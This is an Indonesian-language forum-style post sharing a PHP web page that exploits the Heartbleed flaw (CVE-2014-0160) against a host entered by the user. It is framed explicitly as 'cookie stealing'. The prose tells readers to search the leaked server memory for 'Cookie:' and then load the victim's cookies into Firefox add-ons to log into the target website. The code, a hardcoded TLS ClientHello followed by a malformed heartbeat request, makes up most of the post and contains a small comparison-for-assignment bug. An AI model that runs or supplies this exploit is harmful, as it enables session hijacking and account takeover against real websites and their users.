Heartbeat ~ Cookie Stealing Versi PHP

chmood

Cara menjalankannya cukup mudah, letakan code dibawah ini pada webservernya. 
Kemudian jalankan via browser, sebenarnya lebih efektif menggunakan cli tp gpp,


Masukin host dan port nya stndart 443, kemudian kirim.
Untuk mencari cookies coba tekan di browsernya CTRL + F kemudian masukan text "Cookie:" tanpa kutip, jika ada berarti kita bisa menggunakan cookies tersebut untuk login ke website target.


Untuk memindahkan cookies punya target ke firefox bisa menggunakan add ons mozila firefox seperti cookies manager, tamper data, liveheader.
[url=https://addons.mozilla.org/id/firefox/addon/cookies-manager-plus/]Download Cookies Manager Plus[/url]


<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html" />
<meta name="author" content="ExploreCrew" />
<title>Heartbeat ~ Cookie Stealing</title>
<style type="text/css">
<!--
h1,p{margin: 3px;padding: 3px;}
form,pre{width: 75%;border: 1px solid #ddd; margin: auto;padding: 3px;}
input[type='text']{width: 90%; margin: 13px;padding: 3px;}
input[type='submit']{padding: 10px; margin: 13px;}
-->
</style>
</head>
<body>
<form action="" method="post" enctype="multipart/form-data">
<h1>Heartbeat ~ CVE-2014-0160</h1>
<p></p>
<input type="text" name="host" placeholder="example.com" />
<input type="text" name="port" value="443" placeholder="443"/>
<input type="submit" name="submit" />
<p>by <a href="http://explorecrew.org">BlueBoyz @ ExploreCrew</a></p>
</form>
<br />

<pre>
<?php

if(isset($_POST['submit'])) {

$hello = "16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01";

$hb = "18 03 02 00 03 01 40 00";

function hexbin($string) {
$strz = explode(" ",str_replace("
"," ",$string));
$bin = '';
foreach($strz as $str) {
$bin .= chr(hexdec($str));
}
return $bin;
}

$fp = fsockopen($_POST['host'],$_POST['port'],$errno,$errstr,30);
if(!$fp) {
echo $errstr;
} else {
echo "Connecting...
";

echo "Hello SSL
";
fwrite($fp,hexbin($hello));

$is_hello = true;
$is_hb = false;
while(!feof($fp)) {
if($is_hello == true) {
$buffer = fgets($fp,4096);
$is_hello = false;
} else {
$buffer = fgets($fp,1024);
if($is_hb == false) {
echo "Sending heartbeat request...
";
fwrite($fp,hexbin($hb));
$is_hb == true;
}
}
echo $buffer;
}
fclose($fp);
}
}

?>
</pre>
</body>
</html>



Category
Komentar